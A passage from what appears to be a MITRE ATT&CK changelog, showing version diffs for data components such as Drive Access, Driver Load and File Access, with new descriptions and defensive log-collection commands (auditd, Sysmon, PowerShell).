| | | strant details. This data component can be collected throug |
| | | h the following measures: - WHOIS Services: Use tools or se |
| | | rvices to perform WHOIS lookups: - WHOIS APIs: Automate doma |
| | | in registration lookups with APIs: - Registrar Platforms: Di |
| | | rectly query domain registrars (e.g., GoDaddy, Namecheap) fo |
| | | r detailed registration data. - Threat Intelligence Platform |
| | | s: Integrate domain registration data from services like Rec |
| | | orded Future, RiskIQ, or PassiveTotal for enriched analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:16:34.616Z |
| description | Information about domain name assignments and other domain metadata (ex: WHOIS) | "Domain Name: Domain Registration" data component captures information about the assignment, ownership, and metadata of domain names. This information is often sourced from registries like WHOIS and includes details such as registrant names, contact information, registration dates, expiration dates, and registrar details. This data is invaluable for tracking domain ownership, detecting malicious domain registrations, and identifying trends in adversary behavior. Examples:
- Registrant Information: WHOIS lookup of example.com
- Registration and Expiration Dates: A domain registered a week before being used in phishing attacks.
- Domain Status: Status codes like clientTransferProhibited or serverHold indicate domain restrictions or potential hijacking activity.
- Name Server Information: Name servers point to a public DNS provider often associated with malicious campaigns.
- Privacy Protection: A domain uses WHOIS privacy protection to hide registrant details.
This data component can be collected through the following measures:
- WHOIS Services: Use tools or services to perform WHOIS lookups:
- WHOIS APIs: Automate domain registration lookups with APIs:
- Registrar Platforms: Directly query domain registrars (e.g., GoDaddy, Namecheap) for detailed registration data.
- Threat Intelligence Platforms: Integrate domain registration data from services like Recorded Future, RiskIQ, or PassiveTotal for enriched analysis. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening of a data storage device with an assigned drive lett | t | Refers to the act of accessing a data storage device, such a |
| er or mount point | | s a hard drive, SSD, USB, or network-mounted drive. This dat |
| | | a component logs the opening or mounting of drives, capturin |
| | | g activities such as reading, writing, or executing files wi |
| | | thin an assigned drive letter (e.g., `C:\`, `/mnt/drive`) or |
| | | mount point. Examples: - Removable Drive Insertion: A USB |
| | | drive is inserted, assigned the letter `F:\`, and files are |
| | | accessed. - Network Drive Mounting: A network share `\\serv |
| | | er\share` is mapped to the drive `Z:\`. - External Hard Driv |
| | | e Access: An external drive is connected, mounted at `/mnt/b |
| | | ackup`, and accessed for copying files. - System Volume Acce |
| | | ss: The system volume `C:\` is accessed for modifications to |
| | | critical files. - Cloud-Synced Drives: Cloud storage drives |
| | | like OneDrive or Google Drive are accessed via local mounts |
| | | . This data component can be collected through the followin |
| | | g measures: Windows Event Logs - Relevant Events: - Eve |
| | | nt ID 4663: Logs access to file or folder objects. - Eve |
| | | nt ID 4656: Tracks a handle to an object like a drive or fil |
| | | e. - Configuration: - Enable auditing for "Object Access |
| | | " in Local Security Policy. - Use Group Policy for broad |
| | | er deployment: `Computer Configuration > Windows Settings > |
| | | Security Settings > Advanced Audit Policy Configuration > Ob |
| | | ject Access` Linux System Logs - Command-Line Monitoring: |
| | | Use the `dmesg` or `journalctl` command to monitor drive mou |
| | | nt/unmount events. - Auditd Configuration: Add an audit rule |
| | | for drive access: `auditctl -w /mnt/drive -p rwxa -k drive_ |
| | | access` - Review logs via `/var/log/audit/audit.log`. macOS |
| | | System Logs - Command-Line Monitoring: Use `diskutil list` |
| | | or `fs_usage` to monitor drive access and mount points. - U |
| | | nified Logs: Query unified logs using log show for drive-rel |
| | | ated activities: `log show --info | grep "mount"` Endpoint |
| | | Detection and Response (EDR) Tools - Use EDR solutions to m |
| | | onitor drive activities and collect detailed forensic data. |
| | | SIEM Tools - Ingest logs from endpoints to detect drive ac |
| | | cess patterns. Configure rules to alert on unusual or unauth |
| | | orized drive access. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:42.387Z |
| description | Opening of a data storage device with an assigned drive letter or mount point | Refers to the act of accessing a data storage device, such as a hard drive, SSD, USB, or network-mounted drive. This data component logs the opening or mounting of drives, capturing activities such as reading, writing, or executing files within an assigned drive letter (e.g., `C:\`, `/mnt/drive`) or mount point. Examples:
- Removable Drive Insertion: A USB drive is inserted, assigned the letter `F:\`, and files are accessed.
- Network Drive Mounting: A network share `\\server\share` is mapped to the drive `Z:\`.
- External Hard Drive Access: An external drive is connected, mounted at `/mnt/backup`, and accessed for copying files.
- System Volume Access: The system volume `C:\` is accessed for modifications to critical files.
- Cloud-Synced Drives: Cloud storage drives like OneDrive or Google Drive are accessed via local mounts.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 4663: Logs access to file or folder objects.
- Event ID 4656: Tracks a handle to an object like a drive or file.
- Configuration:
- Enable auditing for "Object Access" in Local Security Policy.
- Use Group Policy for broader deployment: `Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Object Access`
Linux System Logs
- Command-Line Monitoring: Use the `dmesg` or `journalctl` command to monitor drive mount/unmount events.
- Auditd Configuration: Add an audit rule for drive access: `auditctl -w /mnt/drive -p rwxa -k drive_access`
- Review logs via `/var/log/audit/audit.log`.
macOS System Logs
- Command-Line Monitoring: Use `diskutil list` or `fs_usage` to monitor drive access and mount points.
- Unified Logs: Query unified logs using log show for drive-related activities: `log show --info | grep "mount"`
Endpoint Detection and Response (EDR) Tools
- Use EDR solutions to monitor drive activities and collect detailed forensic data.
SIEM Tools
- Ingest logs from endpoints to detect drive access patterns. Configure rules to alert on unusual or unauthorized drive access. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a drive letter or mount point to a d | t | The activity of assigning a new drive letter or creating a m |
| ata storage device | | ount point for a data storage device, such as a USB, network |
| | | share, or external hard drive, enabling access to its conte |
| | | nt on a host system. Examples: - USB Drive Insertion: A US |
| | | B drive is plugged in and automatically assigned the letter |
| | | `E:\` on a Windows machine. - Network Drive Mapping: A netwo |
| | | rk share `\\server\share` is mapped to the drive `Z:\`. - Vi |
| | | rtual Drive Creation: A virtual disk is mounted on `/mnt/vir |
| | | tualdrive` using an ISO image or a virtual hard disk (VHD). |
| | | - Cloud Storage Mounting: Google Drive is mounted as `G:\` o |
| | | n a Windows machine using a cloud sync tool. - External Stor |
| | | age Integration: An external HDD or SSD is connected and ass |
| | | igned `/mnt/external` on a Linux system. This data componen |
| | | t can be collected through the following measures: Windows |
| | | Event Logs - Relevant Events: - Event ID 98: Logs the c |
| | | reation of a volume (mount or new drive letter assignment). |
| | | - Event ID 1006: Logs removable storage device insertion |
| | | s. - Configuration: Enable "Removable Storage Events" in the |
| | | Group Policy settings: `Computer Configuration > Administra |
| | | tive Templates > System > Removable Storage Access` Linux S |
| | | ystem Logs - Command-Line Monitoring: Use `dmesg` or `journ |
| | | alctl` to monitor mount events. - Auditd Configuration: Add |
| | | audit rules to track mount points. - Logs can be reviewed i |
| | | n /var/log/audit/audit.log. macOS System Logs - Unified Lo |
| | | gs: Monitor system logs for mount activity: - Command-Line T |
| | | ools: Use `diskutil list` to verify newly created or mounted |
| | | drives. Endpoint Detection and Response (EDR) Tools - EDR |
| | | solutions can log removable drive usage and network-mounted |
| | | drives. Configure EDR policies to alert on suspicious drive |
| | | creation events. SIEM Tools - Centralize logs from multip |
| | | le platforms into a SIEM (e.g., Splunk) to correlate and ale |
| | | rt on suspicious drive creation activities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:36.536Z |
| description | Initial construction of a drive letter or mount point to a data storage device | The activity of assigning a new drive letter or creating a mount point for a data storage device, such as a USB, network share, or external hard drive, enabling access to its content on a host system. Examples:
- USB Drive Insertion: A USB drive is plugged in and automatically assigned the letter `E:\` on a Windows machine.
- Network Drive Mapping: A network share `\\server\share` is mapped to the drive `Z:\`.
- Virtual Drive Creation: A virtual disk is mounted on `/mnt/virtualdrive` using an ISO image or a virtual hard disk (VHD).
- Cloud Storage Mounting: Google Drive is mounted as `G:\` on a Windows machine using a cloud sync tool.
- External Storage Integration: An external HDD or SSD is connected and assigned `/mnt/external` on a Linux system.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Logs the creation of a volume (mount or new drive letter assignment).
- Event ID 1006: Logs removable storage device insertions.
- Configuration: Enable "Removable Storage Events" in the Group Policy settings:
`Computer Configuration > Administrative Templates > System > Removable Storage Access`
Linux System Logs
- Command-Line Monitoring: Use `dmesg` or `journalctl` to monitor mount events.
- Auditd Configuration: Add audit rules to track mount points.
- Logs can be reviewed in /var/log/audit/audit.log.
macOS System Logs
- Unified Logs: Monitor system logs for mount activity:
- Command-Line Tools: Use `diskutil list` to verify newly created or mounted drives.
Endpoint Detection and Response (EDR) Tools
- EDR solutions can log removable drive usage and network-mounted drives. Configure EDR policies to alert on suspicious drive creation events.
SIEM Tools
- Centralize logs from multiple platforms into a SIEM (e.g., Splunk) to correlate and alert on suspicious drive creation activities. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a drive letter or mount point of a data stor | t | The alteration of a drive letter, mount point, or other attr |
| age device | | ibutes of a data storage device, which could involve reassig |
| | | nment, renaming, permissions changes, or other modifications |
| | | . Examples: - Drive Letter Reassignment: A USB drive previ |
| | | ously assigned `E:\` is reassigned to `D:\` on a Windows mac |
| | | hine. - Mount Point Change: On a Linux system, a mounted sto |
| | | rage device at `/mnt/external` is moved to `/mnt/storage`. - |
| | | Drive Permission Changes: A shared drive's permissions are |
| | | modified to allow write access for unauthorized users or pro |
| | | cesses. - Renaming of a Drive: A network drive labeled "HR_S |
| | | hare" is renamed to "Shared_Resources." - Modification of Cl |
| | | oud-Integrated Drives: A cloud storage mount such as Google |
| | | Drive is modified to sync only specific folders. This data |
| | | component can be collected through the following measures: |
| | | Windows Event Logs - Relevant Events: - Event ID 98: In |
| | | dicates changes to a volume (e.g., drive letter reassignment |
| | | ). - Event ID 1006: Logs permission modifications or cha |
| | | nges to removable storage. - Configuration: Enable "Storage |
| | | Operational Logs" in the Event Viewer: `Applications and Ser |
| | | vices Logs > Microsoft > Windows > Storage-Tiering > Operati |
| | | onal` Linux System Logs - Auditd Configuration: Add audit |
| | | rules to track changes to mounted drives: `auditctl -w /mnt/ |
| | | -p w -k drive_modification` - Command-Line Monitoring: Use |
| | | `dmesg` or `journalctl` to observe drive modifications. mac |
| | | OS System Logs - Unified Logs: Collect mount or drive modif |
| | | ication events: `log show --info | grep "Volume modified"` - |
| | | Command-Line Monitoring: Use `diskutil` to track changes: |
| | | Endpoint Detection and Response (EDR) Tools - Configure pol |
| | | icies in EDR solutions to monitor and log changes to drive c |
| | | onfigurations or attributes. SIEM Tools - Aggregate logs f |
| | | rom multiple systems into a centralized platform like Splunk |
| | | to correlate events and alert on suspicious drive modificat |
| | | ion activities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:35.797Z |
| description | Changes made to a drive letter or mount point of a data storage device | The alteration of a drive letter, mount point, or other attributes of a data storage device, which could involve reassignment, renaming, permissions changes, or other modifications. Examples:
- Drive Letter Reassignment: A USB drive previously assigned `E:\` is reassigned to `D:\` on a Windows machine.
- Mount Point Change: On a Linux system, a mounted storage device at `/mnt/external` is moved to `/mnt/storage`.
- Drive Permission Changes: A shared drive's permissions are modified to allow write access for unauthorized users or processes.
- Renaming of a Drive: A network drive labeled "HR_Share" is renamed to "Shared_Resources."
- Modification of Cloud-Integrated Drives: A cloud storage mount such as Google Drive is modified to sync only specific folders.
This data component can be collected through the following measures:
Windows Event Logs
- Relevant Events:
- Event ID 98: Indicates changes to a volume (e.g., drive letter reassignment).
- Event ID 1006: Logs permission modifications or changes to removable storage.
- Configuration: Enable "Storage Operational Logs" in the Event Viewer:
`Applications and Services Logs > Microsoft > Windows > Storage-Tiering > Operational`
Linux System Logs
- Auditd Configuration: Add audit rules to track changes to mounted drives: `auditctl -w /mnt/ -p w -k drive_modification`
- Command-Line Monitoring: Use `dmesg` or `journalctl` to observe drive modifications.
macOS System Logs
- Unified Logs: Collect mount or drive modification events: `log show --info | grep "Volume modified"`
- Command-Line Monitoring: Use `diskutil` to track changes:
Endpoint Detection and Response (EDR) Tools
- Configure policies in EDR solutions to monitor and log changes to drive configurations or attributes.
SIEM Tools
- Aggregate logs from multiple systems into a centralized platform like Splunk to correlate events and alert on suspicious drive modification activities.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Driver: Driver Load
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Attaching a driver to either user or kernel-mode of a system | t | The process of attaching a driver, which is a software compo |
| (ex: Sysmon EID 6) | | nent that allows the operating system and applications to in |
| | | teract with hardware devices, to either user-mode or kernel- |
| | | mode of a system. This can include benign actions (e.g., har |
| | | dware drivers) or malicious behavior (e.g., rootkits or unsi |
| | | gned drivers). Examples: - Legitimate Driver Loading: A ne |
| | | w graphics driver from a vendor like NVIDIA or AMD is loaded |
| | | into the system. - Unsigned Driver Loading: A driver withou |
| | | t a valid digital signature is loaded into the kernel. - Roo |
| | | tkit Installation: A malicious rootkit driver is loaded to m |
| | | anipulate kernel-mode processes. - Anti-Virus or EDR Driver |
| | | Loading: An Endpoint Detection and Response (EDR) solution l |
| | | oads its driver to monitor system activities. - Driver Misus |
| | | e: A legitimate driver is loaded and exploited to execute ma |
| | | licious actions, such as using vulnerable drivers for bypass |
| | | ing defenses (e.g., Bring Your Own Vulnerable Driver (BYOVD) |
| | | attacks). This data component can be collected through the |
| | | following measures: Windows - Sysmon Logs: - Event I |
| | | D 6: Captures driver loading activity, including file path, |
| | | hashes, and signature information. - Configuration: Ensu |
| | | re Sysmon is configured with a ruleset that monitors driver |
| | | loading events - Windows Event Logs: Enable "Audit Kernel Ob |
| | | ject" to capture kernel-related driver loading events. Linu |
| | | x - Auditd: Configure audit rules to capture driver loading |
| | | events: `auditctl -w /lib/modules/ -p rwxa -k driver_load` |
| | | - Kernel Logs (dmesg): Use dmesg to monitor driver-related a |
| | | ctivities: `dmesg | grep "module"` - Syslog or journald: Rev |
| | | iew logs for module insertion or removal activities. macOS |
| | | - Unified Logs: Use the macOS unified logging system to mon |
| | | itor kext (kernel extension) loads: `log show --predicate 'e |
| | | ventMessage contains "kext load"'` - Endpoint Security Frame |
| | | work: Monitor driver loading via third-party security tools |
| | | that leverage Apple’s Endpoint Security Framework. SIEM Too |
| | | ls - Ingest driver load logs from Sysmon, Auditd, or macOS |
| | | unified logs into a centralized SIEM (e.g., Splunk). - Creat |
| | | e rules to detect unsigned drivers, rootkit activity, or kno |
| | | wn vulnerable drivers. EDR Solutions - Use EDR tools to de |
| | | tect and alert on anomalous driver loading activity. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:49.173Z |
| description | Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6) | The process of attaching a driver, which is a software component that allows the operating system and applications to interact with hardware devices, to either user-mode or kernel-mode of a system. This can include benign actions (e.g., hardware drivers) or malicious behavior (e.g., rootkits or unsigned drivers). Examples:
- Legitimate Driver Loading: A new graphics driver from a vendor like NVIDIA or AMD is loaded into the system.
- Unsigned Driver Loading: A driver without a valid digital signature is loaded into the kernel.
- Rootkit Installation: A malicious rootkit driver is loaded to manipulate kernel-mode processes.
- Anti-Virus or EDR Driver Loading: An Endpoint Detection and Response (EDR) solution loads its driver to monitor system activities.
- Driver Misuse: A legitimate driver is loaded and exploited to execute malicious actions, such as using vulnerable drivers for bypassing defenses (e.g., Bring Your Own Vulnerable Driver (BYOVD) attacks).
This data component can be collected through the following measures:
Windows
- Sysmon Logs:
- Event ID 6: Captures driver loading activity, including file path, hashes, and signature information.
- Configuration: Ensure Sysmon is configured with a ruleset that monitors driver loading events
- Windows Event Logs: Enable "Audit Kernel Object" to capture kernel-related driver loading events.
Linux
- Auditd: Configure audit rules to capture driver loading events: `auditctl -w /lib/modules/ -p rwxa -k driver_load`
- Kernel Logs (dmesg): Use dmesg to monitor driver-related activities: `dmesg | grep "module"`
- Syslog or journald: Review logs for module insertion or removal activities.
macOS
- Unified Logs: Use the macOS unified logging system to monitor kext (kernel extension) loads:
`log show --predicate 'eventMessage contains "kext load"'`
- Endpoint Security Framework: Monitor driver loading via third-party security tools that leverage Apple’s Endpoint Security Framework.
SIEM Tools
- Ingest driver load logs from Sysmon, Auditd, or macOS unified logs into a centralized SIEM (e.g., Splunk).
- Create rules to detect unsigned drivers, rootkit activity, or known vulnerable drivers.
EDR Solutions
- Use EDR tools to detect and alert on anomalous driver loading activity. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Driver: Driver Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a driver and activity around it such a | t | to contextual data about a driver, including its attributes, |
| s driver issues reporting or integrity (page hash, code) che | | functionality, and activity. This can involve details such |
| cking | | as the driver's origin, integrity, cryptographic signature, |
| | | issues reported during its use, and runtime behavior. Exampl |
| | | es include metadata captured during driver integrity checks, |
| | | hash validation, or error reporting. Examples: - Driver S |
| | | ignature Validation: A driver is validated to ensure it is s |
| | | igned by a trusted Certificate Authority (CA). - Driver Hash |
| | | Verification: The hash of a driver is compared to a known g |
| | | ood hash stored in a database. - Driver Compatibility Issues |
| | | : A driver error is logged due to compatibility issues with |
| | | a particular version of the operating system. - Vulnerable D |
| | | river Identification: Metadata indicates the driver version |
| | | is outdated or contains a known vulnerability. - Monitoring |
| | | Driver Integrity: Drivers are monitored for any unauthorized |
| | | modifications to their binary or associated files. This da |
| | | ta component can be collected through the following measures |
| | | : Windows - Windows Event Logs: - Event ID 3000-3006: |
| | | Logs metadata about driver signature validation. - Event |
| | | ID 2000-2011 (Windows Defender Application Control): Tracks |
| | | driver integrity and policy enforcement. - Sysmon Logs: Con |
| | | figure Sysmon to capture driver loading metadata (Event ID 6 |
| | | ). - Driver Verifier: Use Driver Verifier to collect diagnos |
| | | tic and performance data about drivers, including stability |
| | | and compatibility metrics. - PowerShell: Use commands to ret |
| | | rieve metadata about installed drivers: `Get-WindowsDriver - |
| | | Online | Select-Object Driver, ProviderName, Version` Linux |
| | | - Auditd: Configure audit rules to monitor driver interact |
| | | ions and collect metadata: `auditctl -w /lib/modules/ -p rwx |
| | | a -k driver_metadata` - dmesg: Use `dmesg` to extract kernel |
| | | logs with driver metadata: `dmesg | grep "module"` - lsmod |
| | | and modinfo: Commands to list loaded modules and retrieve me |
| | | tadata about drivers: `lsmod` | `modinfo <module_name>` mac |
| | | OS - Unified Logs: Collect metadata from system logs about |
| | | kernel extensions (kexts): `log show --predicate 'eventMessa |
| | | ge contains "kext load"' --info` - kextstat: Command to retr |
| | | ieve information about loaded kernel extensions: `kextstat` |
| | | SIEM Tools - Ingest Driver Metadata: Collect driver metada |
| | | ta logs from Sysmon, Auditd, or macOS logs into SIEMs like S |
| | | plunk or Elastic. Vulnerability Management Tools - Use the |
| | | se tools to collect metadata about vulnerable drivers across |
| | | enterprise systems. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:52.372Z |
| description | Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking | to contextual data about a driver, including its attributes, functionality, and activity. This can involve details such as the driver's origin, integrity, cryptographic signature, issues reported during its use, and runtime behavior. Examples include metadata captured during driver integrity checks, hash validation, or error reporting. Examples:
- Driver Signature Validation: A driver is validated to ensure it is signed by a trusted Certificate Authority (CA).
- Driver Hash Verification: The hash of a driver is compared to a known good hash stored in a database.
- Driver Compatibility Issues: A driver error is logged due to compatibility issues with a particular version of the operating system.
- Vulnerable Driver Identification: Metadata indicates the driver version is outdated or contains a known vulnerability.
- Monitoring Driver Integrity: Drivers are monitored for any unauthorized modifications to their binary or associated files.
This data component can be collected through the following measures:
Windows
- Windows Event Logs:
- Event ID 3000-3006: Logs metadata about driver signature validation.
- Event ID 2000-2011 (Windows Defender Application Control): Tracks driver integrity and policy enforcement.
- Sysmon Logs: Configure Sysmon to capture driver loading metadata (Event ID 6).
- Driver Verifier: Use Driver Verifier to collect diagnostic and performance data about drivers, including stability and compatibility metrics.
- PowerShell: Use commands to retrieve metadata about installed drivers:
`Get-WindowsDriver -Online | Select-Object Driver, ProviderName, Version`
Linux
- Auditd: Configure audit rules to monitor driver interactions and collect metadata: `auditctl -w /lib/modules/ -p rwxa -k driver_metadata`
- dmesg: Use `dmesg` to extract kernel logs with driver metadata: `dmesg | grep "module"`
- lsmod and modinfo: Commands to list loaded modules and retrieve metadata about drivers: `lsmod` | `modinfo `
macOS
- Unified Logs: Collect metadata from system logs about kernel extensions (kexts): `log show --predicate 'eventMessage contains "kext load"' --info`
- kextstat: Command to retrieve information about loaded kernel extensions: `kextstat`
SIEM Tools
- Ingest Driver Metadata: Collect driver metadata logs from Sysmon, Auditd, or macOS logs into SIEMs like Splunk or Elastic.
Vulnerability Management Tools
- Use these tools to collect metadata about vulnerable drivers across enterprise systems. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening a file, which makes the file contents available to t | t | To events where a file is opened or accessed, making its con |
| he requestor (ex: Windows EID 4663) | | tents available to the requester. This includes reading, exe |
| | | cuting, or interacting with files by authorized or unauthori |
| | | zed entities. Examples include logging file access events (e |
| | | .g., Windows Event ID 4663), monitoring file reads, and dete |
| | | cting unusual file access patterns. Examples: - File Read |
| | | Operations: A user opens a sensitive document (e.g., financi |
| | | al_report.xlsx) on a shared drive. - File Execution: A scrip |
| | | t or executable file is accessed and executed (e.g., malware |
| | | .exe is run from a temporary directory). - Unauthorized File |
| | | Access: An unauthorized user attempts to access a protected |
| | | configuration file (e.g., `/etc/passwd` on Linux or `System |
| | | 32` files on Windows). - File Access Patterns: Bulk access t |
| | | o multiple files in a short time (e.g., mass access to docum |
| | | ents on a file server). - File Access via Network: Files on |
| | | a network share are accessed remotely (e.g., logs of SMB fil |
| | | e access). This data component can be collected through the |
| | | following measures: Windows - Windows Event Logs: Event I |
| | | D 4663: Captures file system auditing details, including who |
| | | accessed the file, access type, and file name. - Sysmon: |
| | | - Event ID 11: Logs file creation time changes. - Even |
| | | t ID 1 (process creation): Can provide insight into files ex |
| | | ecuted. - PowerShell: Commands to monitor file access in rea |
| | | l-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; |
| | | ID=4663}` Linux - Auditd: Monitor file access events usin |
| | | g audit rules: `auditctl -w /path/to/file -p rwxa -k file_ac |
| | | cess` - View logs: `ausearch -k file_access` - Inotify: Use |
| | | inotify to track file access on Linux: `inotifywait -m /path |
| | | /to/watch -e access` macOS - Unified Logs: Monitor file ac |
| | | cess using the macOS Unified Logging System. - FSEvents: Fil |
| | | e System Events can track file accesses: `fs_usage | grep op |
| | | en` Network Devices - SMB/CIFS Logs: Monitor file access o |
| | | ver network shares using logs from SMB or CIFS protocol. - N |
| | | AS Logs: Collect logs from network-attached storage systems |
| | | for file access events. SIEM Integration - Collect file ac |
| | | cess logs from all platforms (Windows, Linux, macOS) and cen |
| | | tralize in a SIEM for correlation and analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:07.996Z |
| description | Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) | To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples:
- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.
- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).
- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).
- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).
- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).
This data component can be collected through the following measures:
Windows
- Windows Event Logs: Event ID 4663: Captures file system auditing details, including who accessed the file, access type, and file name.
- Sysmon:
- Event ID 11: Logs file creation time changes.
- Event ID 1 (process creation): Can provide insight into files executed.
- PowerShell: Commands to monitor file access in real-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Monitor file access events using audit rules: `auditctl -w /path/to/file -p rwxa -k file_access`
- View logs: `ausearch -k file_access`
- Inotify: Use inotify to track file access on Linux: `inotifywait -m /path/to/watch -e access`
macOS
- Unified Logs: Monitor file access using the macOS Unified Logging System.
- FSEvents: File System Events can track file accesses: `fs_usage | grep open`
Network Devices
- SMB/CIFS Logs: Monitor file access over network shares using logs from SMB or CIFS protocol.
- NAS Logs: Collect logs from network-attached storage systems for file access events.
SIEM Integration
- Collect file access logs from all platforms (Windows, Linux, macOS) and centralize in a SIEM for correlation and analysis. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new file (ex: Sysmon EID 11) | t | A new file is created on a system or network storage. This a |
| | | ction often signifies an operation such as saving a document |
| | | , writing data, or deploying a file. Logging these events he |
| | | lps identify legitimate or potentially malicious file creati |
| | | on activities. Examples include logging file creation events |
| | | (e.g., Sysmon Event ID 11 or Linux auditd logs). This dat |
| | | a component can be collected through the following measures: |
| | | Windows - Sysmon: Event ID 11: Logs file creation events, |
| | | capturing details like the file path, hash, and creation ti |
| | | me. - Windows Event Log: Enable "Object Access" auditing in |
| | | Group Policy to track file creation under Event ID 4663. - P |
| | | owerShell: Real-time monitoring of file creation:`Get-WinEve |
| | | nt -FilterHashtable @{LogName='Security'; ID=4663}` Linux |
| | | - Auditd: Use audit rules to monitor file creation: `auditct |
| | | l -w /path/to/directory -p w -k file_creation` - View logs: |
| | | `ausearch -k file_creation` - Inotify: Monitor file creation |
| | | with inotifywait: `inotifywait -m /path/to/watch -e create` |
| | | macOS - Unified Logs: Use the macOS Unified Logging Syste |
| | | m to capture file creation events. - FSEvents: Use File Syst |
| | | em Events to monitor file creation: `fs_usage | grep create` |
| | | Network Devices - NAS Logs: Monitor file creation events |
| | | on network-attached storage devices. - SMB Logs: Collect log |
| | | s of file creation activities over SMB/CIFS protocols. SIEM |
| | | Integration - Forward logs from all platforms (Windows, Li |
| | | nux, macOS) to a SIEM for central analysis and alerting. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:18.072Z |
| description | Initial construction of a new file (ex: Sysmon EID 11) | A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs).
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 11: Logs file creation events, capturing details like the file path, hash, and creation time.
- Windows Event Log: Enable "Object Access" auditing in Group Policy to track file creation under Event ID 4663.
- PowerShell: Real-time monitoring of file creation:`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Use audit rules to monitor file creation: `auditctl -w /path/to/directory -p w -k file_creation`
- View logs: `ausearch -k file_creation`
- Inotify: Monitor file creation with inotifywait: `inotifywait -m /path/to/watch -e create`
macOS
- Unified Logs: Use the macOS Unified Logging System to capture file creation events.
- FSEvents: Use File System Events to monitor file creation: `fs_usage | grep create`
Network Devices
- NAS Logs: Monitor file creation events on network-attached storage devices.
- SMB Logs: Collect logs of file creation activities over SMB/CIFS protocols.
SIEM Integration
- Forward logs from all platforms (Windows, Linux, macOS) to a SIEM for central analysis and alerting. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
